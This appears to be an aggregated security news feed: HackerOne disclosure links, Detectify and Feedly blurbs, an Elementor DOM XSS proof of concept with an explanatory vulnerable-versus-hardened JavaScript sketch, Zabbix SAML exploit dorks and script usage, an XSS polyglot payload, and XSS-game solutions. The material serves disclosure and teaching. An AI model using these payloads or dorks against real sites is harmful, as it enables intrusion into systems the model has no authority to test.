Potential IP revealing using UNC Path in Windows File Picker
October 26, 2022 GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1690045 – Bounty: $1000
October 26, 2022 GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1710575 – Bounty: $1800
October 26, 2022 Cloudflare Public Bug Bounty disclosed a bug submitted by ydvanjali: https://hackerone.com/reports/1664974 – Bounty: $250
October 26, 2022 Reddit disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1656380 – Bounty: $1000
October 26, 2022 Informatica disclosed a bug submitted by isumitpatel: https://hackerone.com/reports/994612
October 26, 2022 Nextcloud disclosed a bug submitted by bjoernv: https://hackerone.com/reports/1606961 – Bounty: $100
October 26, 2022 TikTok disclosed a bug submitted by ckerha: https://hackerone.com/reports/1199965 – Bounty: $170
October 26, 2022 Reddit disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1285081 – Bounty: $200
October 26, 2022 Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1661113 – Bounty: $5000
October 26, 2022 Reddit disclosed a bug submitted by heckintosh: https://hackerone.com/reports/1606957 – Bounty: $100
October 26, 2022 Cloudflare Public Bug Bounty disclosed a bug submitted by path_network: https://hackerone.com/reports/1636320 – Bounty: $500
October 26, 2022 Cloudflare Public Bug Bounty disclosed a bug submitted by lohigowda: https://hackerone.com/reports/1675730 – Bounty: $250
October 26, 2022 Flickr disclosed a bug submitted by stevejubs: https://hackerone.com/reports/1581258 – Bounty: $258
October 26, 2022 Yelp disclosed a bug submitted by irfadps: https://hackerone.com/reports/1714970
October 26, 2022 Judge.me disclosed a bug submitted by penguinshelp: https://hackerone.com/reports/1595905 – Bounty: $500
October 26, 2022 Slack disclosed a bug submitted by security_warrior: https://hackerone.com/reports/1661310 – Bounty: $250
October 26, 2022 Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1700276 – Bounty: $1125
October 26, 2022 Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1632921
October 26, 2022 Yelp disclosed a bug submitted by raja404: https://hackerone.com/reports/1712240
October 26, 2022 8×8 disclosed a bug submitted by rajauzairabdullah: https://hackerone.com/reports/790846
October 26, 2022 Yelp disclosed a bug submitted by qualwin3001: https://hackerone.com/reports/1707616
October 26, 2022 Yelp disclosed a bug submitted by er_salil: https://hackerone.com/reports/1023773
October 26, 2022 U.S. Dept Of Defense disclosed a bug submitted by thpless: https://hackerone.com/reports/1624152 – Bounty: $500
October 26, 2022 Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1051373 – Bounty: $5000
October 26, 2022 Adobe disclosed a bug submitted by gdattacker: https://hackerone.com/reports/1661914
October 26, 2022 MTN Group disclosed a bug submitted by possowski: https://hackerone.com/reports/1646248
October 26, 2022 Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1663788 – Bounty: $1200
October 26, 2022 Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1664019 – Bounty: $600
October 26, 2022 Have you ever wished Google Assistant could read you the articles in your Feedly? Now it can. Nick Felker has created a Google Assistant Action that integrates Google Assistant and Feedly. Thanks to the Feedly action, Google Assistant can list the headlines in your feeds, read specific articles, and even…
October 26, 2022 Easily track key business events like funding events, product launches, or partnerships. Industries are changing at a faster pace than ever. Keeping up with new threats and opportunities can be overwhelming and time-consuming. Today, we’re excited to announce a new Leo skill that lets you easily track key strategic moves…
October 26, 2022 We’re excited to launch a new version of the Feedly Web UI that improves the navigation and adds support for a cool dark theme. Here’s a quick demo of the new Feedly dark theme and left navigation bar updates: More visible Add Content (+) The profile and add content are…
October 26, 2022 The post New reward system to accelerate learning and growth on Detectify appeared first on Detectify Labs.
October 26, 2022 The post SSRF vulnerabilities and where to find them appeared first on Detectify Labs.
October 26, 2022 The post How To Hack Web Applications in 2022: Part 2 appeared first on Detectify Labs.
October 26, 2022 The post Module disclosures now available for hackers on Detectify Crowdsource appeared first on Detectify Labs.
October 26, 2022 The post Common Security Vulnerabilities in Core AWS Services: Exploitation and Mitigation appeared first on Detectify Labs.
October 26, 2022 The post Account hijacking using “dirty dancing” in sign-in OAuth-flows appeared first on Detectify Labs.
October 26, 2022 The post Hack with ‘goodfaith’ – A tool to automate and scale good faith hacking appeared first on Detectify Labs.
October 26, 2022 The post How to: Look for TLS private keys on Docker Hub appeared first on Detectify Labs.
October 26, 2022 The post Leveraging AWS QuickSight dashboards to visualize recon data appeared first on Detectify Labs.
October 26, 2022 The post How To Hack Web Applications in 2022: Part 1 appeared first on Detectify Labs.
October 26, 2022 – A DOM-based reflected cross-site scripting (XSS) vulnerability exists in Elementor’s Elementor Website Builder plugin, versions <= 3.5.5. It is tracked as CVE-2022-29455. 4websecurity.com has already reported the vulnerability to tens of thousands of websites running WordPress with this version of the plugin.
References:
– https://nvd.nist.gov/vuln/detail/CVE-2022-29455
– https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor
– https://www.rotem-bar.com/elementor
POC (proof of concept): the settings payload in the URL fragment is Base64 encoded:
https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=
Decoded from…
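The PoC above works because the lightbox handler takes its settings from the URL fragment (attacker-controlled, never sent to the server) and copies the keys of the decoded JSON straight onto a DOM element. The JavaScript below is an added illustration written for this page, not Elementor's code: a simplified model of such a handler, with the vulnerable sink next to a hardened one that copies only an allowlist of named boolean video options. The function names, the allowlist and the plain-object element model are assumptions; the Base64 settings string is the PoC payload quoted above.

```javascript
// Added illustration (not Elementor's code) of the DOM XSS pattern behind
// CVE-2022-29455: a lightbox handler that reads base64-encoded JSON settings
// from the URL fragment and copies "videoParams" onto a <video> element.
// Elements are modelled as plain {tag, attrs} objects so this runs under Node;
// in a browser each "attrs[name] = value" below would be el.setAttribute(name, value).

const ACTION_PREFIX = "#elementor-action:";

// The PoC fragment quoted on this page; decoded it is
// {"type":"video","url":"http://","videoType":"hosted","videoParams":{"onerror":"alert(document.domain)"}}
const POC_HASH =
  "#elementor-action:action=lightbox&settings=" +
  "eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwi" +
  "dmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=";

function base64Decode(s) {
  // atob exists in browsers and in Node >= 16; fall back to Buffer otherwise.
  return typeof atob === "function" ? atob(s) : Buffer.from(s, "base64").toString("utf8");
}

// Parse "#elementor-action:action=...&settings=<base64 JSON>" into {action, settings}.
// Returns null for anything that is not a well-formed action fragment.
// Note: URLSearchParams turns "+" into a space, so a real handler would
// percent-decode or use a URL-safe alphabet; the PoC payload contains no "+".
function parseActionHash(hash) {
  if (typeof hash !== "string" || !hash.startsWith(ACTION_PREFIX)) return null;
  const params = new URLSearchParams(hash.slice(ACTION_PREFIX.length));
  const action = params.get("action");
  const encoded = params.get("settings");
  if (!action || !encoded) return null;
  try {
    return { action, settings: JSON.parse(base64Decode(encoded)) };
  } catch (_) {
    return null; // not base64, or not JSON
  }
}

function createElement(tag) {
  return { tag, attrs: {} };
}

// Vulnerable sink: every key of settings.videoParams becomes an attribute, so an
// attacker-controlled "onerror" (or any on* handler) lands on the element. With
// src "http://" the load fails and the handler fires as soon as the lightbox opens.
function buildVideoVulnerable(settings) {
  const el = createElement("video");
  el.attrs.src = String(settings.url || "");
  for (const [name, value] of Object.entries(settings.videoParams || {})) {
    el.attrs[name] = String(value);
  }
  return el;
}

// Hardened sink: only known boolean <video> options are copied, selected by name,
// and the URL must be http(s). No event-handler attribute can be set from the hash.
const VIDEO_PARAM_ALLOWLIST = new Set(["autoplay", "loop", "muted", "controls", "playsinline"]);

function buildVideoHardened(settings) {
  const el = createElement("video");
  const url = String(settings.url || "");
  if (!/^https?:\/\//i.test(url)) throw new Error("refusing non-http(s) video url");
  el.attrs.src = url;
  for (const [name, value] of Object.entries(settings.videoParams || {})) {
    if (!VIDEO_PARAM_ALLOWLIST.has(name)) continue; // drops onerror, onload, style, ...
    if (value) el.attrs[name] = "";                 // boolean attribute: present or absent
  }
  return el;
}

// Triage helper: which script-bearing (on*) attribute names would the vulnerable
// sink emit for a given lightbox fragment? Useful for checking a suspect URL.
function scriptAttributesFromHash(hash) {
  const parsed = parseActionHash(hash);
  if (!parsed || parsed.action !== "lightbox") return [];
  return Object.keys(buildVideoVulnerable(parsed.settings).attrs).filter((n) => /^on/i.test(n));
}
```

Running `scriptAttributesFromHash(POC_HASH)` returns `["onerror"]`, which is the handler the PoC plants; the hardened builder produces a `<video>` with only `src` set from the same input. Allowlisting attribute names (rather than blocklisting `on*`) is the design choice that matters here, because the attacker controls the whole JSON object and any denylist will eventually miss a script-capable attribute.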
October 26, 2022 On instances where SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because the user login stored in the session is not verified.
Dork:
shodan-query: http.favicon.hash:892542951
fofa-query: app=”ZABBIX-监控系统” && body=”saml”
Usage:
nuclei -l target.txt -tags zabbix
python3 zabbix_session_exp.py -t https:target.com…
October 26, 2022 You must have heard about time travel in movies, series and comics. Well, here we are. No, I’m not joking: you can travel back in time and fetch the endpoints of web applications for further exploitation. Don’t believe me? You will after travelling with TheTimeMachine. PS: Doesn’t…
October 26, 2022 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
October 26, 2022 In penetration testing, browser extensions are commonly used to locate broken links and report them to the client, and they also help determine whether a target website contains vulnerabilities that could lead to exploitation and theft of sensitive information. Here are the different Chrome extensions that are…
October 26, 2022 Hi guys, this is Neil Harvey Miñano, a newbie security researcher from the Philippines. This is my first write-up, and I am not good at XSS, so forgive all mistakes. It was 04/20/2021, my first day of bug hunting. I’m still a newbie! Today I am going to share a reflected XSS vulnerability that…
October 26, 2022 Improper Access Control to Remote Code Execution (CVE-2020-8591). In this post I will explain how I compromised a whole system by exploiting an improper access control vulnerability in the popular Java-based MaaS software “eG Manager”, and how I escalated it to remote code execution. Impact: the Improper Access Control weakness…
October 26, 2022 Speaking with the team at Open Bug Bounty was the highlight of her day for Aviva Zacks of Safety Detectives. She learned that their community-driven spirit is exactly what advantageously differentiates their project from the others out there. https://www.safetydetectives.com/blog/interview-open-bug-bounty/
October 26, 2022 https://xss-game.appspot.com/
Level #1: Hello, world of XSS (https://xss-game.appspot.com/level1)
Solution: <script>alert('xss')</script>
Hint: inspect the source code of the page
Level #2: Persistence is key (https://xss-game.appspot.com/level2)
Solution: <img src=x onerror=alert('XSS')>
Hint: the “welcome” post contains HTML
Level #3: That sinking feeling… (https://xss-game.appspot.com/level3/frame#1)
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
Level #4: Context matters (https://xss-game.appspot.com/level4/frame)
Solution: timer=');alert('xss
Level #5: Breaking protocol (https://xss-game.appspot.com/level5/frame)
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')
Level #6: Follow the X (https://xss-game.appspot.com/level6/frame#/static/gadget.js)
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')…